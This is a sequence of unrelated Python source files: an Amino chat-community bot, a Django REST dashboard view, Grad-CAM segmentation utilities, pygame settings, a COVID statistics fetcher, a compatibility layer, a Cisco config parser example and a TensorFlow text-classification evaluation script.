fig.write_html(path_html)
return fig.show()
# Create Widgets
col_widget = widgets.SelectMultiple(options=ops,value=(),rows=7,description='Select Columns:',disabled=False)
title = widgets.Text(value = " Chart Title",
placeholder = "Insert Title Here",
description = "Chart title",
disabled = False)
heading = widgets.HBox([title,col_widget])
button = widgets.Button(description = "Generate Chart")
display(heading)
display(button)
def on_button_clicked(button):
"""
Function used for button click
"""
clear_output()
display(heading)
display(button)
_plot(df,cols = col_widget.value)
button.on_click(functools.partial(on_button_clicked))
|
from urllib.request import urlopen
from datetime import datetime
from random import choice
from json import dumps, load, loads
from contextlib import suppress
from pathlib import Path
from uuid import uuid4
from threading import Thread
from .local_amino import Client, SubClient, ACM
from .commands import *
from .extensions import *
path_utilities = "utilities"
path_amino = f'{path_utilities}/amino_list'
def print_exception(exc):
print(repr(exc))
class Bot(SubClient, ACM):
def __init__(self, client: Client, community, prefix: str = "!", bio: str = None, activity: bool = False) -> None:
self.client = client
self.marche = True
self.prefix = prefix
self.bio_contents = bio
self.activity = activity
self.session = self.client.session
if isinstance(community, int):
self.community_id = community
self.community = self.client.get_community_info(comId=self.community_id)
self.community_amino_id = self.community.aminoId
else:
self.community_amino_id = community
self.informations = self.client.get_from_code(f"http://aminoapps.com/c/{community}")
self.community_id = self.informations.json["extensions"]["community"]["ndcId"]
self.community = self.client.get_community_info(comId=self.community_id)
self.community_name = self.community.name
super().__init__(comId=self.community_id, profile=self.client.profile)
try:
self.community_leader_agent_id = self.community.json["agent"]["uid"]
except Exception:
self.community_leader_agent_id = "-"
try:
self.community_staff_list = self.community.json["communityHeadList"]
except Exception:
self.community_staff_list = ""
if self.community_staff_list:
self.community_leaders = [elem["uid"] for elem in self.community_staff_list if elem["role"] in (100, 102)]
self.community_curators = [elem["uid"] for elem in self.community_staff_list if elem["role"] == 101]
self.community_staff = [elem["uid"] for elem in self.community_staff_list]
if not Path(f'{path_amino}/{self.community_amino_id}.json').exists():
self.create_community_file()
old_dict = self.get_file_dict()
new_dict = self.create_dict()
def do(k, v): old_dict[k] = v
def undo(k): del old_dict[k]
[do(k, v) for k, v in new_dict.items() if k not in old_dict]
[undo(k) for k in new_dict.keys() if k not in old_dict]
self.update_file(old_dict)
# self.subclient = SubClient(comId=self.community_id, profile=client.profile)
self.banned_words = self.get_file_info("banned_words")
self.locked_command = self.get_file_info("locked_command")
self.message_bvn = self.get_file_info("welcome")
self.welcome_chat = self.get_file_info("welcome_chat")
self.prefix = self.get_file_info("prefix")
self.favorite_users = self.get_file_info("favorite_users")
self.favorite_chats = self.get_file_info("favorite_chats")
self.update_file()
# self.activity_status("on")
new_users = self.get_all_users(start=0, size=30, type="recent")
self.new_users = [elem["uid"] for elem in new_users.json["userProfileList"]]
def create_community_file(self):
with open(f'{path_amino}/{self.community_amino_id}.json', 'w', encoding='utf8') as file:
dict = self.create_dict()
file.write(dumps(dict, sort_keys=False, indent=4))
def create_dict(self):
return {"welcome": "", "prefix": self.prefix, "welcome_chat": "", "locked_command": [], "favorite_users": [], "favorite_chats": [], "banned_words": []}
def get_dict(self):
return {"welcome": self.message_bvn, "prefix": self.prefix, "welcome_chat": self.welcome_chat, "locked_command": self.locked_command,
"favorite_users": self.favorite_users, "favorite_chats": self.favorite_chats, "banned_words": self.banned_words}
def update_file(self, dict=None):
if not dict:
dict = self.get_dict()
with open(f"{path_amino}/{self.community_amino_id}.json", "w", encoding="utf8") as file:
file.write(dumps(dict, sort_keys=False, indent=4))
def get_file_info(self, info: str = None):
with open(f"{path_amino}/{self.community_amino_id}.json", "r", encoding="utf8") as file:
return load(file)[info]
def get_file_dict(self, info: str = None):
with open(f"{path_amino}/{self.community_amino_id}.json", "r", encoding="utf8") as file:
return load(file)
def get_banned_words(self):
return self.banned_words
def set_prefix(self, prefix: str):
self.prefix = prefix
self.update_file()
def set_welcome_message(self, message: str):
self.message_bvn = message.replace('"', '“')
self.update_file()
def set_welcome_chat(self, chatId: str):
self.welcome_chat = chatId
self.update_file()
def add_favorite_users(self, value: str):
self.favorite_users.append(value)
self.update_file()
def add_favorite_chats(self, value: str):
self.favorite_chats.append(value)
self.update_file()
def add_banned_words(self, liste: list):
self.banned_words.extend(liste)
self.update_file()
def add_locked_command(self, liste: list):
self.locked_command.extend(liste)
self.update_file()
def remove_favorite_users(self, value: str):
liste = [value]
[self.favorite_users.remove(elem) for elem in liste if elem in self.favorite_users]
self.update_file()
def remove_favorite_chats(self, value: str):
liste = [value]
[self.favorite_chats.remove(elem) for elem in liste if elem in self.favorite_chats]
self.update_file()
def remove_banned_words(self, liste: list):
[self.banned_words.remove(elem) for elem in liste if elem in self.banned_words]
self.update_file()
def remove_locked_command(self, liste: list):
[self.locked_command.remove(elem) for elem in liste if elem in self.locked_command]
self.update_file()
def unset_welcome_chat(self):
self.welcome_chat = ""
self.update_file()
def is_in_staff(self, uid):
return uid in self.community_staff
def is_leader(self, uid):
return uid in self.community_leaders
def is_curator(self, uid):
return uid in self.community_curators
def is_agent(self, uid):
return uid == self.community_leader_agent_id
def accept_role(self, rid: str = None):
with suppress(Exception):
self.accept_organizer(rid)
return True
with suppress(Exception):
self.promotion(noticeId=rid)
return True
return False
def get_staff(self, community):
if isinstance(community, int):
with suppress(Exception):
community = self.client.get_community_info(com_id=community)
else:
try:
informations = self.client.get_from_code(f"http://aminoapps.com/c/{community}")
except Exception:
return False
community_id = informations.json["extensions"]["community"]["ndcId"]
community = self.client.get_community_info(comId=community_id)
try:
community_staff_list = community.json["communityHeadList"]
community_staff = [elem["uid"] for elem in community_staff_list]
except Exception:
community_staff_list = ""
else:
return community_staff
def get_user_id(self, name_or_id):
members = self.get_all_users(size=1).json['userProfileCount']
start = 0
lower_name = None
while start <= members:
users = self.get_all_users(start=start, size=100).json['userProfileList']
for user in users:
name = user['nickname']
uid = user['uid']
if name_or_id == name or name_or_id == uid:
return (name, uid)
if not lower_name and name_or_id.lower() in name.lower():
lower_name = (name, uid)
start += 100
return lower_name if lower_name else None
def ask_all_members(self, message, lvl: int = 20, type_bool: int = 1):
def ask(uid):
try:
self.start_chat(userId=[uid], message=message)
except Exception:
self.start_chat(userId=[uid], message=message)
size = self.get_all_users(start=0, size=1, type="recent").json['userProfileCount']
st = 0
while size > 0:
value = size
if value > 100:
value = 100
users = self.get_all_users(start=st, size=value)
if type_bool == 1:
[ask(user["uid"]) for user in users.json['userProfileList'] if user['level'] == lvl]
elif type_bool == 2:
[ask(user["uid"]) for user in users.json['userProfileList'] if user['level'] <= lvl]
elif type_bool == 3:
[ask(user["uid"]) for user in users.json['userProfileList'] if user['level'] >= lvl]
size -= 100
st += 100
def ask_amino_staff(self, message):
self.start_chat(userId=self.community_staff, message=message)
def get_chat_id(self, chat: str = None):
with suppress(Exception):
return self.get_from_code(f"http://aminoapps.com/c/{chat}").objectId
with suppress(Exception):
chati = self.get_from_code(f"{chat}").objectId
return chati
val = self.get_public_chat_threads()
for title, chat_id in zip(val.title, val.chatId):
if chat == title:
return chat_id
for title, chat_id in zip(val.title, val.chatId):
if chat.lower() in title.lower() or chat == chat_id:
return chat_id
return False
def upload_bubble(self,file,comId):
data=file
response = self.session.post(f"https://service.narvii.com/api/v1/x{comId}/s/chat/chat-bubble/templates/107147e9-05c5-405f-8553-af65d2823457/generate", data=data, headers=self.headers)
bid=loads(response.text)['chatBubble']['bubbleId']
print(bid)
response = self.session.post(f"https://service.narvii.com/api/v1/x{comId}/s/chat/chat-bubble/{bid}", data=data, headers=self.headers)
if response.status_code !=200:
return loads(response.text)
else: return bid
def copy_bubble(self, chatId: str, replyId: str, comId: str = None):
if not comId:
comId = self.community_id
header = {
'Accept-Language': 'en-US',
'Content-Type': 'application/octet-stream',
'User-Agent': 'Dalvik/2.1.0 (Linux; U; Android 7.1; LG-UK495 Build/MRA58K; com.narvii.amino.master/3.3.33180)',
'Host': 'service.narvii.com',
'Accept-Encoding': 'gzip',
'Connection': 'Keep-Alive',
}
a = self.get_message_info(chatId=chatId, messageId=replyId).json["chatBubble"]["resourceUrl"]
with urlopen(a) as zipresp:
yo = zipresp.read()
response = self.session.post(f"https://service.narvii.com/api/v1/x{comId}/s/chat/chat-bubble/templates/107147e9-05c5-405f-8553-af65d2823457/generate", data=yo, headers=header)
bid = loads(response.text)['chatBubble']['bubbleId']
response = self.session.post(f"https://service.narvii.com/api/v1/{comId}/s/chat/chat-bubble/{bid}", data=yo, headers=header)
def stop_instance(self):
self.marche = False
def start_instance(self):
self.marche = True
Thread(target=self.passive).start()
def leave_amino(self):
self.marche = False
for elem in self.get_public_chat_threads().chatId:
with suppress(Exception):
self.leave_chat(elem)
self.client.leave_community(comId=self.community_id)
def check_new_member(self):
if not (self.message_bvn or self.welcome_chat):
return
new_list = self.get_all_users(start=0, size=25, type="recent")
new_member = [(elem["nickname"], elem["uid"]) for elem in new_list.json["userProfileList"]]
for elem in new_member:
name, uid = elem[0], elem[1]
val = self.get_wall_comments(userId=uid, sorting='newest').commentId
if not val and self.message_bvn:
with suppress(Exception):
self.comment(message=self.message_bvn, userId=uid)
if not val and self.welcome_chat:
with suppress(Exception):
self.invite_to_chat(chatId=self.welcome_chat, userId=uid)
new_users = self.get_all_users(start=0, size=30, type="recent")
self.new_users = [elem["uid"] for elem in new_users.json["userProfileList"]]
def welcome_new_member(self):
new_list = self.get_all_users(start=0, size=25, type="recent")
new_member = [(elem["nickname"], elem["uid"]) for elem in new_list.json["userProfileList"]]
for elem in new_member:
name, uid = elem[0], elem[1]
val = self.get_wall_comments(userId=uid, sorting='newest').commentId
if not val or uid not in self.new_users and self.message_bvn:
with suppress(Exception):
self.comment(message=self.message_bvn, userId=uid)
if uid not in self.new_users and self.welcome_chat:
with suppress(Exception):
self.invite_to_chat(chatId=self.welcome_chat, userId=uid)
new_users = self.get_all_users(start=0, size=30, type="recent")
self.new_users = [elem["uid"] for elem in new_users.json["userProfileList"]]
def feature_chats(self):
for elem in self.favorite_chats:
with suppress(Exception):
self.favorite(time=2, chatId=elem)
def feature_users(self):
featured = [elem["uid"] for elem in self.get_featured_users().json["userProfileList"]]
for elem in self.favorite_users:
if elem not in featured:
with suppress(Exception):
self.favorite(time=1, userId=elem)
def get_member_level(self, uid):
return self.get_user_info(userId=uid).level
def get_member_titles(self, uid):
with suppress(Exception):
return self.get_user_info(userId=uid).customTitles
return False
def get_wallet_amount(self):
return self.client.get_wallet_info().totalCoins
def generate_transaction_id(self):
return str(uuid4())
def pay(self, coins: int = 0, blogId: str = None, chatId: str = None, objectId: str = None, transactionId: str = None):
if not transactionId:
transactionId = self.generate_transaction_id()
self.send_coins(coins=coins, blogId=blogId, chatId=chatId, objectId=objectId, transactionId=transactionId)
def favorite(self, time: int = 1, userId: str = None, chatId: str = None, blogId: str = None, wikiId: str = None):
self.feature(time=time, userId=userId, chatId=chatId, blogId=blogId, wikiId=wikiId)
def unfavorite(self, userId: str = None, chatId: str = None, blogId: str = None, wikiId: str = None):
self.unfeature(userId=userId, chatId=chatId, blogId=blogId, wikiId=wikiId)
def join_chatroom(self, chat: str = None, chatId: str = None):
if not chat:
with suppress(Exception):
self.join_chat(chatId)
return ""
with suppress(Exception):
chati = self.get_from_code(f"{chat}").objectId
self.join_chat(chati)
return chat
chats = self.get_public_chat_threads()
for title, chat_id in zip(chats.title, chats.chatId):
if chat == title:
self.join_chat(chat_id)
return title
chats = self.get_public_chat_threads()
for title, chat_id in zip(chats.title, chats.chatId):
if chat.lower() in title.lower() or chat == chat_id:
self.join_chat(chat_id)
return title
return False
def start_screen_room(self, chatId: str, joinType: int=1):
self.client.join_video_chat(comId=self.community_id, chatId=chatId, joinType=joinType)
def start_voice_room(self, chatId: str, joinType: int=1):
self.client.join_voice_chat(comId=self.community_id, chatId=chatId, joinType=joinType)
def join_screen_room(self, chatId: str, joinType: int=1):
self.client.join_video_chat_as_viewer(comId=self.community_id, chatId=chatId, joinType=joinType)
def get_chats(self):
return self.get_public_chat_threads()
def join_all_chat(self):
for elem in self.get_public_chat_threads().chatId:
with suppress(Exception):
self.join_chat(elem)
def leave_all_chats(self):
for elem in self.get_public_chat_threads().chatId:
with suppress(Exception):
self.leave_chat(elem)
def follow_user(self, uid):
self.follow(userId=[uid])
def unfollow_user(self, uid):
self.unfollow(userId=uid)
def add_title(self, uid: str, title: str, color: str = None):
member = self.get_member_titles(uid)
try:
titles = [i['title'] for i in member] + [title]
colors = [i['color'] for i in member] + [color]
except TypeError:
titles = [title]
colors = [color]
self.edit_titles(uid, titles, colors)
return True
def remove_title(self, uid: str, title: str):
member = self.get_member_titles(uid)
tlist = []
clist = []
for t in member:
if t["title"] != title:
tlist.append(t["title"])
clist.append(t["color"])
self.edit_titles(uid, tlist, clist)
return True
def passive(self):
def upt_activity():
timeNow = int(datetime.timestamp(datetime.now()))
timeEnd = timeNow + 300
try:
self.send_active_obj(startTime=timeNow, endTime=timeEnd)
except Exception:
pass
def change_bio_and_welcome_members():
if self.welcome_chat or self.message_bvn:
Thread(target=self.welcome_new_member).start()
try:
if isinstance(self.bio_contents, list):
self.edit_profile(content=choice(self.bio_contents))
elif isinstance(self.bio_contents, str):
self.edit_profile(content=self.bio_contents)
except Exception as e:
print_exception(e)
def feature_chats():
try:
Thread(target=self.feature_chats).start()
except Exception as e:
print_exception(e)
def feature_users():
try:
Thread(target=self.feature_users).start()
except Exception as e:
print_exception(e)
feature_chats()
feature_users()
j = 0
k = 0
while self.marche:
change_bio_and_welcome_members()
if j >= 24:
feature_chats()
j = 0
if k >= 288:
feature_users()
k = 0
if self.activity:
try:
self.activity_status('on')
except Exception:
pass
upt_activity()
slp(300)
j += 1
k += 1
|
from .cls import TextClassifier, main as predict_cls
from .det import TextDetector, main as predict_det
from .rec import TextRecognizer, main as predict_rec
from .system import TextSystem, main as predict_system
|
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework.viewsets import ViewSet
from rest_framework.permissions import IsAuthenticated
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.admin.models import LogEntry
from django.urls import reverse
from dashboard.mixins import DashboardMixin
from dashboard.containers import DashboardContainer
from dashboard.serializers import DashboardSerializer
class DashboardViewSet(ViewSet, LoginRequiredMixin):
login_url = '/login/'
permission_classes = (IsAuthenticated, )
queryset = LogEntry.objects.all()[:20]
def list(self, request):
container = []
for entry in self._log_iterator():
obj = entry.get_edited_object()
title = obj.getTitle()
content = obj.getContent()
date = obj.create_date
url = obj.get_absolute_url()
author = str(entry.user.employee)
container.append(DashboardContainer(title, content, date, url, author))
return Response(DashboardSerializer(container, many=True).data)
def _log_iterator(self):
objects = [cls.__name__.lower() for cls in DashboardMixin.__subclasses__()]
entryies = LogEntry.objects.filter(action_flag=1, content_type__model__in=objects)[:20]
for entry in entryies:
yield entry
|
import keras
import keras.backend as K
import os
import cv2
import numpy as np
import scipy
def makedir_if_nexist(dir_list):
"""Create empty directory if it does not already exist
Parameters
----------
dir_list : list of str
List of directories to create
"""
for cur_dir in dir_list:
if not os.path.exists(cur_dir):
os.makedirs(cur_dir)
def resize_stack(stack, size):
"""Resize stack to specified 2D size
Parameters
----------
stack : numpy 4D array (size: B x C x H x W), where B = batch size, C = number of classes
The stack to be resized
size : list of int
The 2D size to be resized to
Returns
-------
stack : numpy 4D array (size: B x C x H x W), where B = batch size, C = number of classes
The resized stack
"""
old_stack = stack[:]
stack = np.zeros((stack.shape[0], stack.shape[1], size[0], size[1]))
for i in range(stack.shape[0]):
for j in range(stack.shape[1]):
stack[i, j] = cv2.resize(old_stack[i, j], (size[0], size[1]))
return stack
def find_final_layer(model):
"""Find final layer's name in model
Parameters
----------
model : keras.engine.sequential.Sequential object
The input model
Returns
-------
(final_layer) : str
The name of the final layer
"""
for iter_layer, layer in reversed(list(enumerate(model.layers))):
if type(layer) == type(layer) == keras.layers.convolutional.Conv2D:
return model.layers[iter_layer+1].name
raise Exception('Could not find the final layer in provided HistoNet')
def get_grad_cam_weights(input_model, final_layer, dummy_image, should_normalize=True):
"""Obtain Grad-CAM weights of the model
Parameters
----------
input_model : keras.engine.sequential.Sequential object
The input model
final_layer : str
The name of the final layer
dummy_image : numpy 4D array (size: 1 x H x W x 3)
A dummy image to calculate gradients
should_normalize : bool, optional
Whether to normalize the gradients
Returns
-------
weights : numpy 2D array (size: F x C), where F = number of features, C = number of classes
The Grad-CAM weights of the model
"""
conv_output = input_model.get_layer(final_layer).output # activation_7
num_classes = input_model.output_shape[1]
num_feats = int(conv_output.shape[-1])
weights = np.zeros((num_feats, num_classes))
def normalize(x):
# utility function to normalize a tensor by its L2 norm
return x / (K.sqrt(K.mean(K.square(x))) + 1e-5)
for iter_class in range(input_model.output_shape[1]):
# Obtain the gradients from the classifier wrt. the final convolutional layer
y_c = input_model.layers[-2].output[0, iter_class]
if should_normalize:
grad = normalize(K.gradients(y_c, conv_output)[0])
else:
grad = K.gradients(y_c, conv_output)[0]
grad_func = K.function([input_model.layers[0].input, K.learning_phase()], [conv_output, grad])
conv_val, grad_val = grad_func([dummy_image, 0])
conv_val, grad_val = conv_val[0], grad_val[0]
# Apply 2D mean
weights[:, iter_class] = np.mean(grad_val, axis=(0, 1))
return weights
def grad_cam(input_model, weights, images, is_pass_threshold, final_layer, keep_inds, orig_sz=[224, 224], should_upsample=False):
"""Generate Grad-CAM
Parameters
----------
input_model : keras.engine.sequential.Sequential object
The input model
weights : numpy 2D array (size: F x C), where F = number of features, C = number of classes
The Grad-CAM weights of the model
images : numpy 4D array (size: B x H x W x 3), where B = batch size
The batch of input images
is_pass_threshold : numpy 2D bool array (size: B x C), where B = batch size, C = number of classes
An array saving which classes pass the pre-defined thresholds for each image in the batch
final_layer : str
The name of the final layer
keep_inds : numpy 1D array
Array of class indices to keep
orig_sz : list of int, optional
2D size of original images
should_upsample : bool, optional
Whether to upsample the generated Grad-CAM activation maps to original input size
Returns
-------
cams_thresh : numpy 4D array (size: B x H x W x C), B = batch size, C = number of classes
The thresholded Grad-CAMs
"""
# Obtain gradients and apply weights
conv_output = input_model.get_layer(final_layer).output # activation_7
conv_func = K.function([input_model.layers[0].input], [conv_output])
conv_val = conv_func([images])
conv_val = conv_val[0]
cams = np.maximum(np.einsum('ijkl,lm->ijkm', conv_val, weights), 0)
cams = cams[:, :, :, keep_inds]
# Upsample to original size if requested
if should_upsample:
old_cams = cams[:]
cams = np.zeros((old_cams.shape[0], orig_sz[0], orig_sz[1], old_cams.shape[-1]))
for i in range(cams.shape[0]):
for j in range(cams.shape[-1]):
cams[i, :, :, j] = cv2.resize(cams[i, :, :, j], (orig_sz[0], orig_sz[1]))
# Eliminate classes not passing threshold
cams_thresh = cams * np.expand_dims(np.expand_dims(is_pass_threshold, axis=1), axis=2)
return cams_thresh
def read_batch(img_dir, batch_names, batch_sz, sz, img_mean=[193.09203, 193.09203, 193.02903],
img_std=[56.450138, 56.450138, 56.450138]):
"""Read a batch of images
Parameters
----------
img_dir : str
Directory holding the input images
batch_names : list of str
Filenames of the input images
batch_sz : int
The batch size
img_mean : list of float (size: 3), optional
Three-channel image set mean
img_std : list of float (size: 3), optional
Three-channel image set standard deviation
Returns
-------
img_batch_norm : numpy 4D array (size: B x H x W x 3), B = batch size
Normalized batch of input images
img_batch : numpy 4D array (size: B x H x W x 3), B = batch size
Unnormalized batch of input images
"""
img_mean = np.float64(img_mean)
img_std = np.float64(img_std)
img_batch = np.empty((batch_sz, sz[0], sz[1], 3), dtype='uint8')
for i in range(batch_sz):
tmp = cv2.cvtColor(cv2.imread(os.path.join(img_dir, batch_names[i])), cv2.COLOR_RGB2BGR)
if tmp.shape[:2] != sz:
img_batch[i] = cv2.resize(tmp, (sz[0], sz[1]))
img_batch_norm = np.zeros_like(img_batch, dtype='float64')
img_batch_norm[:, :, :, 0] = (img_batch[:, :, :, 0] - img_mean[0]) / img_std[0]
img_batch_norm[:, :, :, 1] = (img_batch[:, :, :, 1] - img_mean[1]) / img_std[1]
img_batch_norm[:, :, :, 2] = (img_batch[:, :, :, 2] - img_mean[2]) / img_std[2]
return img_batch_norm, img_batch
def get_fgbg_cues(cues, H_fg, H_bg, class_inds, indices, thresh):
"""Get weak foreground/background cues
Parameters
----------
cues : dict
Weak foreground/background cues, as a dictionary of passing classes and cue locations
H_fg : numpy 4D array (size: B x C x H x W), B = batch size, C = number of classes
Activation maps of foreground network
H_bg : numpy 4D array (size: B x C x H x W), B = batch size, C = number of classes
Activation maps of background network
class_inds : numpy 1D array (size: B), B = batch size
Image indices in current batch
indices : list (size: B), B = batch size
Image indices in current batch, as a list
thresh: float
Confidence value for thresholding activation maps [0-1]
Returns
-------
cues: dict
Weak foreground/background cues, as a dictionary of passing classes and cue locations
"""
n_seg_classes = H_fg.shape[1] + 1
localization_onehot = np.zeros((H_fg.shape[0], n_seg_classes, H_fg.shape[2], H_fg.shape[3]), dtype='int64')
localization = np.zeros_like(localization_onehot)
# Obtain localization cues
# - Background
for iter_input_image in range(H_bg.shape[0]):
# grad = scipy.ndimage.median_filter(H_bg[iter_input_image], 3)
grad = scipy.ndimage.median_filter(np.sum(H_bg[iter_input_image], axis=0), 3)
thr = np.sort(grad.ravel())[int(0.1 * grad.shape[0] * grad.shape[1])]
localization[iter_input_image, 0] = grad < thr
# - Foreground
for i in range(1, n_seg_classes):
localization[:, i] = H_fg[:, i-1] > thresh * np.max(H_fg[:, i-1])
# Solve overlap conflicts
class_rank = np.argsort(-np.sum(np.sum(localization, axis=-1), axis=-1)) # from largest to smallest masks
localization_ind = np.zeros((H_fg.shape[0], H_fg.shape[2], H_fg.shape[3]), dtype='int64')
img_inds = np.arange(class_rank.shape[0])
for iter_class in range(class_rank.shape[1]):
cur_masks = localization[img_inds, class_rank[:, iter_class]]
localization_ind *= np.int64(cur_masks == 0)
localization_ind += np.expand_dims(np.expand_dims(class_rank[:, iter_class]+1, axis=1), axis=2) * cur_masks
for iter_class in range(class_rank.shape[1]):
localization_onehot[:, iter_class] = localization_ind == (iter_class+1)
# Save true one-hot encoded values
for i,x in enumerate(indices):
cues['%d_labels' % x] = class_inds[i]
cues['%d_cues' % x] = np.array(np.where(localization_onehot[i]))
return cues
def get_fg_cues(cues, H_fg, class_inds, indices, thresh):
"""Get weak foreground cues
Parameters
----------
cues : dict
Weak foreground/background cues, as a dictionary of passing classes and cue locations
H_fg : numpy 4D array (size: B x C x H x W), B = batch size, C = number of classes
Activation maps of foreground network
class_inds : numpy 1D array (size: B), B = batch size
Image indices in current batch
indices : list (size: B), B = batch size
Image indices in current batch, as a list
thresh: float
Confidence value for thresholding activation maps [0-1]
Returns
-------
cues: dict
Weak foreground/background cues, as a dictionary of passing classes and cue locations
"""
n_seg_classes = H_fg.shape[1]
localization_onehot = np.zeros((H_fg.shape[0], n_seg_classes, H_fg.shape[2], H_fg.shape[3]), dtype='int64')
localization = np.zeros_like(localization_onehot)
# Obtain localization cues
for i in range(n_seg_classes):
localization[:, i] = H_fg[:, i] > thresh * np.max(H_fg[:, i])
# Solve overlap conflicts
class_rank = np.argsort(-np.sum(np.sum(localization, axis=-1), axis=-1)) # from largest to smallest masks
localization_ind = np.zeros((H_fg.shape[0], H_fg.shape[2], H_fg.shape[3]), dtype='int64')
img_inds = np.arange(class_rank.shape[0])
for iter_class in range(class_rank.shape[1]):
cur_masks = localization[img_inds, class_rank[:, iter_class]]
localization_ind *= np.int64(cur_masks == 0)
localization_ind += np.expand_dims(np.expand_dims(class_rank[:, iter_class]+1, axis=1), axis=2) * cur_masks
for iter_class in range(class_rank.shape[1]):
localization_onehot[:, iter_class] = localization_ind == (iter_class+1)
# Save true one-hot encoded values
for i,x in enumerate(indices):
cues['%d_labels' % x] = class_inds[i]
cues['%d_cues' % x] = np.array(np.where(localization_onehot[i]))
return cues
def get_colours(segset):
"""Obtain class segmentation colours, given the dataset
Parameters
----------
segset : str
The dataset to segment, (i.e. 'ADP-morph', 'ADP-func', 'VOC2012', 'DeepGlobe_train75', or 'DeepGlobe_train37.5')
Returns
-------
(colours) : numpy 1D array of 3-tuples
Class segmentation colours for the given dataset
"""
if segset == 'ADP-morph':
return np.array([(255, 255, 255), (0, 0, 128), (0, 128, 0), (255, 165, 0), (255, 192, 203),
(255, 0, 0), (173, 20, 87), (176, 141, 105), (3, 155, 229),
(158, 105, 175), (216, 27, 96), (244, 81, 30), (124, 179, 66),
(142, 36, 255), (240, 147, 0), (204, 25, 165), (121, 85, 72),
(142, 36, 170), (179, 157, 219), (121, 134, 203), (97, 97, 97),
(167, 155, 142), (228, 196, 136), (213, 0, 0), (4, 58, 236),
(0, 150, 136), (228, 196, 65), (239, 108, 0), (74, 21, 209)])
elif segset == 'ADP-func':
return np.array([(255, 255, 255), (3, 155, 229), (0, 0, 128), (0, 128, 0), (173, 20, 87)])
elif segset == 'VOC2012':
return np.array([(0, 0, 0), (128, 0, 0), (0, 128, 0), (128, 128, 0),
(0, 0, 128), (128, 0, 128), (0, 128, 128), (128, 128, 128),
(64, 0, 0), (192, 0, 0), (64, 128, 0), (192, 128, 0),
(64, 0, 128), (192, 0, 128), (64, 128, 128), (192, 128, 128),
(0, 64, 0), (128, 64, 0), (0, 192, 0), (128, 192, 0),
(0, 64, 128)]) # using palette for pascal voc
elif 'DeepGlobe' in segset:
return np.array([(0, 255, 255), (255, 255, 0), (255, 0, 255), (0, 255, 0), (0, 0, 255),
(255, 255, 255), (0, 0, 0)])
|
# © 2019 KidsCanCode LLC / All rights reserved.
#honestly not a lot I can put in here, but I'll add more when we add more.
import pygame
# game options/settings
TITLE = "Jumpy!"
WIDTH = 480
HEIGHT = 600
FPS = 60
# Environment options
GRAVITY = 9.8
# Player properties
PLAYER_ACC = 0.5
PLAYER_FRICTION = -0.01
# define colors
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
RED = (255, 0, 0)
GREEN = (0, 255, 0)
BLUE = (0, 0, 255)
YELLOW = (255, 255, 0)
COLOR = (271, 100, 27)
ORANGE = (255, 69, 0)
OTHERCOOLCOLOR = (45,0,60)
LIGHTBLUE = (173, 216, 230)
|
"""To identify the geo and stats"""
import json
import os
import sys
import time
import urllib
import urllib.error
import urllib.parse
import urllib.request
import requests
base_url = "https://freegeoip.app/json/"
class Identify:
# for checking geo and ip
def raw_data(self):
res_1 = urllib.request.urlopen(base_url).read().decode()
res_1 = json.loads(res_1)
return res_1
# Calling Api for fetching stat data
def covid_stats(self):
data = self.raw_data()
country = data["country_name"]
covid_api_url = (
"https://corona.lmao.ninja/v2/countries/{}?yesterday&strict&query".format(
country
)
)
res_stats = requests.get(covid_api_url).content
source_dict = json.loads(res_stats)
cases = source_dict["cases"]
today_cases = source_dict["todayCases"]
deaths, today_deaths, recovered, today_recovered, active, tests = (
source_dict["deaths"],
source_dict["todayDeaths"],
source_dict["recovered"],
source_dict["todayRecovered"],
source_dict["active"],
source_dict["tests"],
)
yield cases, today_cases, deaths, today_deaths, recovered, today_recovered, active, tests
|
class Constants:
APP_NAME = "EVOLUTION_CHAMBER"
COMPARISONS_PER_GENERATION = 100
POPULATION_SIZE = 20
KILL_SIZE = 10
|
# coding: utf-8
# pylint: disable=W0611
"""Compatibility layer"""
from __future__ import absolute_import as _abs
import sys
PY3 = (sys.version_info[0] == 3)
def assert_python_min_ver(py2_ver, py3_ver, info_str):
"""Enforce minimum Python version for Python 2.x and 3.x"""
py2_ver_ = py2_ver.split('.')
py3_ver_ = py3_ver.split('.')
if len(py2_ver_) != 2 or len(py3_ver_) != 2 or \
py2_ver_[0] != '2' or py3_ver_[0] != '3':
raise ValueError('Incorrect version format')
if PY3:
if sys.version_info[1] < int(py3_ver_[1]):
raise RuntimeError('Python {} or newer is required. Feature: {}'\
.format(py3_ver, info_str))
else:
if sys.version_info[1] < int(py2_ver_[1]):
raise RuntimeError('Python {} or newer is required. Feature: {}'\
.format(py2_ver, info_str))
# String handling for Python 2 and 3
if PY3:
STRING_TYPES = (str,)
def py_str(string):
"""Convert C string back to Python string"""
return string.decode('utf-8')
def _str_decode(string):
return string.decode('utf-8')
def _str_encode(string):
return string.encode('utf-8')
else:
STRING_TYPES = (basestring,) # pylint: disable=E0602
def py_str(string):
"""Convert C string back to Python string"""
return string
def _str_decode(string):
return string
def _str_encode(string):
return string
# define DEVNULL
if PY3:
from subprocess import DEVNULL
else:
import os
DEVNULL = open(os.devnull, 'r+b')
__all__ = []
|
#!/usr/bin/env python
""" Example 8
- read cisco config
- print crypto sections will all children
"""
from ciscoconfparse import CiscoConfParse
cfg_parser = CiscoConfParse('cisco_ipsec.txt')
crypto_lines = cfg_parser.find_objects(r'^crypto map CRYPTO')
for cline in crypto_lines:
print cline.text
for child in cline.children:
print child.text
|
from .vosk import KaldiRecognizer, Model
|
# -*- coding: utf-8 -*-
# Author: XuMing <shibing624@126.com>
# Data: 17/10/16
# Brief: cnn网络结构
import csv
import os
import numpy as np
import tensorflow as tf
from tensorflow.contrib import learn
import config
import data_helpers
from util import to_categorical
if config.eval_all_train_data:
x_raw, y = data_helpers.load_data_labels(config.data_dir)
y = to_categorical(y)
y = np.argmax(y, axis=1)
elif config.infer_data_path:
infer_datas = list(open(config.infer_data_path, "r", encoding="utf-8").readlines())
infer_datas = [s.strip() for s in infer_datas]
x_raw = data_helpers.load_infer_data(infer_datas)
y = []
else:
x_raw = data_helpers.load_infer_data(
["do you think it is right.", "everything is off.", "i hate you .", "it is a bad film.",
"good man and bad person.", "价格不是最便宜的,招商还是浦发银行是238*12=2856.00人家还可以分期的。",
u"驱动还有系统要自装,还有显卡太鸡巴低了.还有装系统太麻烦了"
])
y = [1, 0, 0, 0, 1, 0, 1]
# map data into vocabulary
checkpoint_dir = config.checkpoint_dir
vocab_path = os.path.join(checkpoint_dir, "..", "vocab")
print("vocab_path:", vocab_path)
